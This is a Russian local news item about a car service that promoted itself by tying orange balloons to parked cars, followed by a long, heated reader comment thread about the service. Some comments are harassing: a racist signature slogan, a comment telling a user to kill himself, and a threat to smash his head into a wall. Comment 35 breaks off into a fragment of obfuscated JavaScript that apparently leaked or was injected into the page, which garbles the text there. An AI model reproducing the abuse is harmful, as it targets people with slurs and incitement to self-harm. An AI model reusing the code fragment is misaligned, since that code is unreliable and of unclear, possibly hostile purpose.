Последние комментарии:

вчера в 14:11 написал ponni
20.11.2024 22:44 написал ponni
15.11.2024 23:54 написал ponni
09.11.2024 00:00 написал ponni
29.10.2024 18:48 написал ponni
27.10.2024 16:10 написал ТЕРРАН
27.10.2024 16:07 написал ТЕРРАН
27.10.2024 16:04 написал ТЕРРАН
24.10.2024 22:25 написал sprinter
18.10.2024 07:53 написал sprinter
12.10.2024 10:47 написал alex33kaw
10.10.2024 08:51 написал sprinter
02.10.2024 19:41 написал ponni
27.09.2024 16:36 написал ponni
24.09.2024 17:28 написал sprinter

Оранжевое настроение


Оранжевое настроение

Сегодня соц.сети пестрят фотографиями припаркованных автомобилей с оранжевыми шариками. Как оказалось, это рекламная акция нового автосервиса.

"Выглянула в окно, а там на всех автомобилях оранжевые шарики. Кто-то с утра решил сделать всем автомобилистам оранжевое настроение", - делится впечатлениями северчанка Яна Ромадина.

"Прикольная реклама автосервиса! Утром были приятно удивлены", - рассказывает Галина Фалалеева.

"Спонсор настроения пятницы Fit Автосервис", - комментирует фотографию Елена Аникина.

Оранжевое настроение
Оранжевое настроение
Оранжевое настроение
Оранжевое настроение
Оранжевое настроение
Оранжевое настроение
Оранжевое настроение
Оранжевое настроение
Оранжевое настроение





Автор: vk.com/vseverskeinfo

Категория: Блоги

Комментарии: (52) 

06 мая 2016   4

Информация

Посетители, находящиеся в группе Гости, не могут оставлять комментарии в данной новости.
 

Комментарий № 1:

Написал: Halif
Прикольно! Креативно

Комментарий № 2:

Написал: sambrella
хороший рекламный ход!

Комментарий № 3:

Написал: ПолиграфПолиграфович
Офигенно!!! Жаль на мою машину шарик не прицепили. Кстати, слышал отзывы об этом сервисе в Томске, весьма положительные.

Комментарий № 4:

Написал: gigi
ПолиграфПолиграфович,Внимательно погуглите и увидите весьма другие отзывы!!!



--------------------
Если б я имел коня....

Комментарий № 5:

Написал: shrek
 раз съездил больше не поеду (крахоборы!)

Комментарий № 6:

Написал: sergus
Там цены конские, кто к ним ездит вообще? ОФлигархи и дураки которые бабло не считают.
Крахоборы - точно сказано, лучше в сервис дяди дальше ездить буду....

Комментарий № 7:

Написал: MrSpoil
shrek,
Это всё Обама,у нас даже бесплатная диагностика-это "крохоборы" .Сколько вам счет выставили за эту услугу?

Комментарий № 8:

Написал: Иваныч
и нас обмануть хотели bully


--------------------
Работать негры !!!

Комментарий № 9:

Написал: Tofik
Оранжевое настроение... оранжевая революция... так о чём это я)))


--------------------
Ещё 6 лет стабильности!

Комментарий № 10:

Написал: yantanka
wink  сегодняшнее солнечное "оранжевое" утро зарядило на весь день! Здорово придумали!

Комментарий № 11:

Написал: тайга

Интересно , а хоть у одного их спеца – механика есть соответствующее образование ?  Или просто с улицы набрали , лишь бы гайки крутить умел ? Все эти шарики – это лишь фантики , а что же за ними скрывается коль понадобился пиар совершенно не по теме ?



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 12:

Написал: тайга

Или просто разводят лохов на шарики и фантики ???



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 13:

Написал: Бука
Конечно дорого, за франшизу явно не один десяток миллионов отдали, их нужно как-то возвращать, но можно в приставку поиграть(наверное платно?) или мелками порисовать.

Комментарий № 14:

Написал: MrSpoil
X-box и 4 или 5 видов кофе чая и карамельки абсолютно бесплатно.Сертификация спецов  в FitLab.Какие еще будут доводы обосрать ребят? wink 

Комментарий № 15:

Написал: тайга
MrSpoil,

А что от обычного и вполне закономерного  вопроса ребята уже сразу обосрались ?   Кто их сертифицировал ? Какое есть диагностическое оборудование ? Какие программы ?



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 16:

Написал: SergeyHasan
хоть что то позитивное в нашем городе

Комментарий № 17:

Написал: gigi
Что такое фитлаб и что кроме модного названия дает?Все это фуфел,а сертификатов я вам напечатаю сколь угодно!Образование=это минимум пту по специальности автослесарь+практика на производствах и т.д. и т.п.Не втирайте дичь,никто не поедет в китай какать на огороды!Вам только рыбалить на лоха.А истинное лицо вашего фитсервиса известно по все РФ.Вам и гугл в помощь и яндекс и ЯП и Дром и Пикабу-где живые люди дают отзывы...Товарищи клиенты-запомните одну мудрость-Хороший автослесарь не работает на дядю!Он работает на себя...


--------------------
Если б я имел коня....

Комментарий № 18:

Написал: vikuly
ПолиграфПолиграфович,
В Томске и тут разные сервисы.

Комментарий № 19:

Написал: MrSpoil
тайга,
http://fitautolab.ru/
А если интересно о дианостическом оборудование,то можите найти фотоотчет открытия в группе фитов в вк,там подробно продемонстрированно все.И после прошу сказать,у кого есть в Северске такой же комплексный аналог 

Комментарий № 20:

Написал: тайга
MrSpoil,

То есть все оборудование  что показано в рекламном ролике по предложенной вами ссылке установлено и функционирует в Северске ? Я правильно понял ?   А давайте я сделаю по другому , например заеду на бесплатную диагностику по купону  , сам посмотрю что там есть , поговорю и дам свою оценку спецам , посмотрю на оборудование и умение им пользоваться , а потом  расскажу здесь как это есть на самом деле . Как вам такой вариант ?    А то я как то не очень с доверием отношусь к людям когда они на простые  вопросы (см. ком. выше)  начинают ссылаться на рекламные ролики , юлить и уходить от прямых ответов !



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 21:

Написал: MrSpoil
тайга,
внимательнее читайте,фотоотчет о наличии оборудования выложен в группе вк,вы посмотрели лишь ролик в котором представлен учебный центр на которых обучаются механики и электрики.Записаться вы можете без проблем.Ходить по цеху и расказывать механикам как работать вам никто не позволит(для этого боксы оборудованны видеонаблюдением за вашим авто),лишь по окончанию работ ,одев каску и халат вы сможете зайти в цех ремонта и стоять за ограничительной линией (по системе 5 с).Если есть желание поучить кого то ,можете в автосервис к дяде заехать и он думаю с радостью выслушает все ваши рекомендации как нужно работать в автосервисе.Ваше право высказывать мнение "доверяй но проверяй",так же как и ваше право отказаться от условий обслуживания на вышеуказанных условиях.
Думаю такой ,более развернутый ответ вас устроит,а не " см. ком. выше".
И очень было бы мне интересно посмотреть как вы с таким подходом бы зашли к официалам ,тем же 100 коней,тойота центр и тд))))) 

Комментарий № 22:

Написал: MrSpoil
тайга,
Вы в ресторанах тоже на кухню заходите ,проверяете квалификацию поворов и расказываете как это должно быть?! lol lol
Вроде как вы получаете результат на основе которого вы делаете вывод ,которым вы можете поделиться с окружающими .

Комментарий № 23:

Написал: тайга
MrSpoil,

Уважаемый и опять же вы «соскальзываете» с темы , да еще и пытаетесь «наехать» по вами же выдуманному основанию ! Вот например вы пишите : Ходить по цеху и расказывать механикам как работать вам никто не позволит" А теперь приведите мою цитату где я намеревался ходдить по цеху с целью рассказывать механикам как надо работать ? Пожалуйста , жду , ответьте за свои слова !

 


--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 24:

Написал: тайга
   И далее вы пишите :

 
Цитата: MrSpoil
.Если есть желание поучить кого то ,можете в автосервис к дяде заехать и он думаю с радостью выслушает все ваши рекомендации как нужно работать в автосервисе.
 Где вы видите в моих комментариях желание ходить и кого то чему то учить ?  То есть вы мне приписываете то чего я не говорил ?  Отсюда закономерный вопрос – в своей работе вы тоже занимаетесь приписками ?



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 25:

Написал: MrSpoil
Цитата: тайга
А давайте я сделаю по другому , например заеду на бесплатную диагностику по купону  , сам посмотрю что там есть , поговорю и дам свою оценку спецам , посмотрю на оборудование и умение им пользоваться , а потом  расскажу здесь как это есть на самом деле
 
Окей,опечаточка вышла,беседовать с механиками которые впринципе не должны контактировать с клиентами,и тратить свое время на демонстрацию работ на оборудовании,у них есть своя работа и она оплачивается,за диалоги с клиентами им никто не платит. 
Автосервис ревизорро wink  ,спасибо за хорошее настроение lol 
Теперь вы ответьте многоуважаемый ,на мой вопрос про "рестораны",а то ваша степенб юления уже тоже начинает зашкаливать) 

Комментарий № 26:

Написал: MrSpoil
тайга,
Шерлок холмс из вас никакой,раз вы подумали ,что я сотрудник этого автосервиса) belay 

Комментарий № 27:

Написал: тайга

Далее : лишь по окончанию работ ,одев каску и халат вы сможете зайти в цех ремонта и стоять за ограничительной линией (по системе 5 с) : Я да и не только могут такие правила расценить как « скрывают , значить есть что скрывать»  ! А иначе как можно объяснить то что человеку запрещено увидеть как делается например диагностика его авто ?  Или это компьютеризованный стенд с распечаткой графиков и диаграмм , или это « полупьяный дядя Вася» из соседнего гаража , который походил вокруг , попинал колесо и выдал результат ?



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 28:

Написал: тайга
Цитата: MrSpoil
Теперь вы ответьте многоуважаемый ,на мой вопрос про "рестораны",а то ваша степенб юления уже тоже начинает зашкаливать) 
 Тема ресторанов в данном блоге не обсуждается !  По поводу моего юления прошу доводы , а не голословное утверждение !



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 29:

Написал: тайга
Цитата: MrSpoil
тайга, Шерлок холмс из вас никакой,раз вы подумали ,что я сотрудник этого автосервиса)
 Да , я предположил что вы как то с ним связаны ! Если нет , то хотелось бы пообщаться с представителем этого сервиса , а с вами мне в таком случае говорить не о чем .



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 30:

Написал: gigi
Я вас перебью-наличие оборудования не есть показатель умения с ним работать.Показатель квалификации специалиста-умение работать без оного,либо с минимальным набором так называемого оборудования.Таких сервисов-где на пару тройку лямов набирают оборудования(зачастую даже сэкономив на хороших подьемниках)и нанимают студентов,полумутных дядей петь с автоколонн 1976 и тд.....Таких сервисов и в томске и у нас валом.Где вам готовы впарить-У нас суперпупер шмупер дупер оборудование и специалисты,а по факту покрасят краской лампочку,возьмут 2500 и вуаля........


--------------------
Если б я имел коня....

Комментарий № 31:

Написал: MrSpoil
тайга,
почитал в общем я всю вашу историю коментариев и постов,достаточно минимум познаний в различении психотипа человека и мне этого минимума было достаточно понять,что вы максимум комнатный опозиционер,кторой готов обосрать всех и вся и выставить себя в лучшем свете "максимально осведомленной личностью" и повешать себе картонную медальку "всезнайки" и радостно хлопать в ладошки) tongue 
На этой счастливой ноте закончю с вами диалог,парям желаю успехов в их начинании.А сам побежал точить фруктики)
Удачи тебе тайга,не забывай,что ты живешь не в тайге а городе,и мир не крутится вокруг тебя и твоей "землянки. 

Комментарий № 32:

Написал: тайга

Данный сервис – это сфера облуживания , а потому работники сервиса это обслуживающий персонал !  И в таком случае не мешало бы напомнить несколько основополагающих принципов для обслуживающего персонала : 1 – «Желание клиента – закон» 2- «Клиент всегда прав» 3- «Любой каприз за ваши деньги» ! Данный сервис громко о себе заявил назвав в купоне себя «Федеральной сетью» , тем самым поднял планку не только для себя не только к технологичности работ и их качеству , но и к праву  требований со стороны клиентов !  Так что как говорится –«Назвался груздем , полезай в кузовок» !!!

 

Естественно понимая куда я приехал за услугой с подобными требованиями я не обращусь к «дяде Васе из соседнего гаража» , но если уж федеральная сеть , то будьте добры  соответствовать  не «Дяде Васе» и не шараге под названием «Тормоз» что за углом  !!!



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 33:

Написал: тайга
gigi,

Согласен с вами на все 100%  !   Нужно достойное грамотное обслуживание , а уж мы как говорится за ценой не постоим !  Из личного опыта могу сказать  , что на сегодняшний день хорошие спецы из гаражей на голову выше хваленых , разрекламированных сервисных сотрудников ! Это факт и с этим не поспоришь !



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 34:

Написал: gigi
тайга,
в точку!


--------------------
Если б я имел коня....

Комментарий № 35:

Написал: Evgen 2
Сотрудники в сервисах? хм.... что то ни разу не встречал. В основном тупое полуграмотное мясо, которое путает антифриз с жидкостью ГУР. // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "vseverske.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий № 36:

Написал: depthcore
Цитата: тайга
И в таком случае не мешало бы напомнить несколько основополагающих принципов для обслуживающего персонала : 1 – «Желание клиента – закон» 2- «Клиент всегда прав» 3- «Любой каприз за ваши деньги» !

Какой-то список влажных желаний закомплексованного нищеброда. wink wink wink

Комментарий № 37:

Написал: воспитатель
про "сто коней" там работают слесаря не сильно то и разбирающиеся в авто, заезжал развести тормозные колодки  ручника и что развели так, что ваше пропали, да ещё наговорили кучу проблем с машиной, ни копейки не заплатил, еле вырвался от них, пришлось ехать в гаражные мастерские там ржали до коликов, сделали без проблем, как то развал делал в сто коней в 2010 о ужас задние просто съедать стало колёсья, приехал, мне денежки вернули сообщив, что у них оборудование сломалось, поехал в гаражи опять сделали без проблем, вот теперь только по гаражным мастерским и катаюсь, в сервис ни нагой.

Комментарий № 38:

Написал: Seversk-7
Только Ремавто в Томске. В Северске только колеса подкачиваю и масло меняю.

Комментарий № 39:

Написал: тайга
Seversk-7,

Сочувствую , видимо в Северске не знаешь нормальных спецов ! А таковых достаточно и скажу более , некоторые Томичи с серьезными  проблемами авто , со сложным ремонтом гоняют через знакомых машины в Северск на ремонт.



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 40:

Написал: тайга
Цитата: depthcore
Какой-то список влажных желаний закомплексованного нищеброда.
 Оооо!  Оно уже и до чувства юмора эволюционировало !!!  Само шутит , само угорает над своей шуткой !  Чудо , а ты так сразу и увлажнилось от списка ? Извращенец ты наш Рокфеллерообразный  , тебе старый велосипед подарили  что ты в эту тему залез ?



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 41:

Написал: gigi
тайга,
Полностью соглашусь и подтверждаю!И это касается еще и жестянки!С томска гоняют к нам!!


--------------------
Если б я имел коня....

Комментарий № 42:

Написал: depthcore
тайга, Ты то там свой двигатель на торсионных полях, наверное только в институт Курчатова возишь на диагностику? Куда уж тут местным....

А твоим кодексом вооружаются чм.ошники, которые кредитнулись и пошли покупать телевизор или вот капиталку ходовки делать, и у них кураж от денег начинается, и специалист (какой-нибудь студент-продавец, который не от лучшей жизни работает в таком месте) уже для них челядь, он ведь клиент и всегда прав и желания его закон. Противно на таких "клиентов" смотреть. Естественно перед "дядей Васей" из гаража так щеки не подуешь, ключом на 32 по лицу сразу прилетит, а то и хуже.

А вот представь ты простой слесарюга, а тут тебе говорят, я вот клиент, всегда прав, давай мне свечи наоборот вкручивай, я в интернете прочитал что так расход падает, ты начинаешь ему объяснять что он что-то видимо напутал, но он на тебя щеки дует что его желания закон и вообще он тут наличкой платит, но при этом не дай бог его машина не заведется (а она не заведется), так такой "важный" клиент потом гавном про сервис пол интернета зальет, он же в интернете читал лайфхаки, его не обманешь, мастер просто был жопорукий...

И вижу я твои рекомендации уже не первый раз и понимаю, что ты и есть такой чм.ошник, который ноздри и щеки любит подуть, а помножить еще это все на твою веру в торсионные поля и прочую мракобесину, так вообще эталонный посетитель кредитной стойки в М.Видео.

Такие обычно еще специалисту\продавцу залечивают что они сами матерые "инженер-механик\физик-ядерщик\программист\сварщик" и типа их не проведешь... wink

Комментарий № 43:

Написал: Halif
тайга,
Лучшее, что ты можешь сделать для человечества - это просто убиться об стену

Комментарий № 44:

Написал: тайга
depthcore,

Придурковатей комментарий  полностью извращающий смысл написанного мной выше , но впрочем точно характеризующий его автора ! fellow  



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 45:

Написал: тайга
Цитата: Halif
тайга, Лучшее, что ты можешь сделать для человечества - это просто убиться об стену
 Я рассмотрю твое предложение , но сначала мне нужно убедится в его эффективности , а потому тебе придется продемонстрировать что это действительно так как ты утверждаешь !               &n
bsp;            &nbs
p;             
        
             &n
bsp;       
Готовься , обратный отсчет пошел !



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 46:

Написал: тайга
gigi,

Из личного опыта : была проблема с головкой блока ц.  , приехал в «типа крутой сервис» , собралось человек 5 , около часа ходили кругами , щупали , слушали , нюхали , ковыряли в носу .  Выдали результат – дней 10 на ремонт ,  от 25 т.р. денег , гарантии никакой .  Приехал по  рекомендации в гаражи , вышел мужичек (парень), внимательно выслушал историю , открыл капот , послушал и говорит  ; 5 т.р. денег , к утру будет готово , гарантирую что будет ходить после ремонта тысяч 100 -120 !!!!!!!!!!!!!!!! Вот и вся разница !!! Машина после его ремонта уже прошла около 70 тыс. , полет нормальный !!!  Рекомендовал этого Спеца многим своим знакомым , все очень довольны , не одного случая косячной работы !   А поэтому я убежден , что среди гаражных Спецов есть (не все конечно) настоящие уникумы – самородки из которых один стоит больше типа «крутого сервиса»  .   Это как музыканты – лучшие таланты в переходах и на улице , а раскрученные бездари на сценах !  



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 47:

Написал: Halif
Цитата: тайга
Я рассмотрю твое предложение , но сначала мне нужно убедится в его эффективности , а потому тебе придется продемонстрировать что это действительно так как ты утверждаешь !

Продемонстрировать? Да без проблем! Готов лично воткнуть твою голову в стену

Комментарий № 48:

Написал: тайга
Цитата: Halif
Продемонстрировать? Да без проблем! Готов лично воткнуть твою голову в стену
 А очко не треснет …………. , втыкальшик диванный ? (номерок скинь в личку )



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 49:

Написал: PeterThePig
Видос снимите, и сюда выложите потом. Народ хоть потешите ))))

Комментарий № 50:

Написал: тайга

Сегодня знакомый позвонил в эту гнилую канторку , спросил сколько будет стоить ремонт главного цилиндра сцепления на ГАЗ 3110  и сколько займет время  . Ответ был просто потрясающим  - « у нас для такой работы нет специалиста , он уехал на обучение !!!!)  Надеюсь знающие люди от такого ответа просто охренеют ! Всего то перетряхнуть главный Ц. на Волге и у них нет спеца ! Все , это полное дно  , слов нет !!!



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 51:

Написал: Диковинка
Жаль, что я не видила раньше отзывов об этом сервисе.....
Заехала фильтр топливный поменять, 40 минут, комната с камерами и тд.
Поехала на работу. Через три часа машина не заводится, раз -два, на третий завелась, даехала. Не было времени в этот день вяснить причину, на следующий день опять - не заводится с первого раза и все. поехали на следующий......а нам сказали "электрика нет, будет через три дня"  А КАК  Я ЕЗДИТЬ БУДУ, их не волнует. 

Комментарий № 52:

Написал: Диковинка
Сломали клапан.

"ВЫ ХОТЕЛИ ПОМЕНЯТЬ ТОПЛИВНЫЙ ФИЛЬТР, МЫ ЕГО ВАМ ПОМЕНЯЛИ, А ТО ЧТО ТАМ ПОСЛЕДСТВИЯ КАКИЕ-ЛИБО БУДУТ НАС НЕ ЕБЕТ, Я ЗНАЛ ЧТО ТЫ ПРИЕДЕШЬ ОБРАТНО"
на вопрос почему не предупредили, что такое может быть.
"ЧТОБ НЕ БЫЛО ЛИШНИХ РАЗГОВОРОВ"

ВОТ ТАКОЙ БЫЛ ПОЛУЧЕН ОТВЕТ.  

ЛЮДИ НЕ ЕЗДИЙТЕ ТУДА!!!!!!!!!! 
stroimguru.ru
Курс валюты:
102.5 76↓   $     107.4 25↓  

Опрос дня:

Вы будете делать прививку от коронавируса?

Нет   49.38%
   
Да, планирую   8.64%
   
Да, но если заставят (на работе / для путешествий)   4.94%
   
Уже сделал   27.16%
   
Затрудняюсь ответить   9.88%
   
Всего голосов: 81

Все опросы >>

Архив статей: